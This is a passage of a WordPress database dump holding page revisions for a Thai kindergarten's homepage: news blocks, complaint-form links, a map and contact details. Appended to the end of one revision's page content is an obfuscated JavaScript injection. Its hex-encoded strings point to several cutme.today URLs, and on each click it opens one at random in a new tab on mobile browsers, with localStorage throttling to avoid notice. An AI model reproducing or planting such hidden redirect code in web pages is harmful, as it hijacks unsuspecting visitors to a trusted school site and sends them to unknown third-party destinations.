0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:55:15','2024-08-29 07:55:15','',19,'http://watprato.ssk.in.th/?p=275',0,'revision','',0),
(276,2,'2024-08-30 08:51:45','2024-08-30 01:51:45','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 